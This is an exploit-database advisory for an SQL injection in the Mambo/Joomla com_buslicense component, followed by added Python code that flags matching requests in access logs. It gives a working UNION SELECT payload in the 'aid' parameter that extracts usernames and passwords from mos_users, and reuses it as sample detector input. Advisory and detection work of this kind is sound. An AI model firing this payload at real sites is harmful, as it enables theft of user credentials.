Joomla! Mambo Component com_buslicense - aid SQL Injection

2008-01-30T00:00:00
ID EXPLOITPACK:A739E4E9EDDE5159071AAED0BFE667D6
Type exploitpack
Reporter S@BUN
Modified 2008-01-30T00:00:00

Description

source: https://www.securityfocus.com/bid/27508/info

The 'com_buslicense' component for Mambo/Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_buslicense&sectionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/*
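
A log check for the request shown above, added here as an example and not part of the original advisory or the component's code: it flags com_buslicense requests whose id parameters are not plain integers. The access-log format, the sample lines, and the treatment of sectionid and Itemid as integer ids are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Treating sectionid and Itemid as integer ids alongside aid is an assumption.
NUMERIC_PARAMS = ("aid", "sectionid", "Itemid")
ID_RE = re.compile(r"\d{1,10}")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_request(url):
    """Return (param, value) pairs in a com_buslicense request that are not plain integers."""
    # parse_qs percent-decodes values, so encoded input is checked in decoded form.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_buslicense" not in query.get("option", []):
        return []
    return [(name, value)
            for name in NUMERIC_PARAMS
            for value in query.get(name, [])
            if not ID_RE.fullmatch(value)]

def scan_access_log(lines):
    """Return [(line_number, findings)] for log lines whose ids fail the integer check."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        findings = check_request(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Request path and query taken from the URL on this page.
PAGE_REQUEST = ("/index.php?option=com_buslicense&sectionid=9999&Itemid=9999&task=list"
                "&aid=-1/**/union/**/select/**/0,username,0x3a,password,"
                "4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/*")

# Constructed log lines (addresses, timestamps and sizes are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jan/2008:10:00:00 +0000] "GET /index.php?option=com_buslicense'
    '&sectionid=3&Itemid=12&task=list&aid=7 HTTP/1.1" 200 5120',
    f'192.0.2.77 - - [30/Jan/2008:10:00:05 +0000] "GET {PAGE_REQUEST} HTTP/1.1" 200 7301',
    '192.0.2.10 - - [30/Jan/2008:10:00:09 +0000] "GET /index.php?option=com_content'
    '&aid=intro HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, findings in scan_access_log(SAMPLE_LOG):
        print(number, findings)
```

The same integer check, applied to aid inside the component before the value reaches the query, is the input-side counterpart of this log filter.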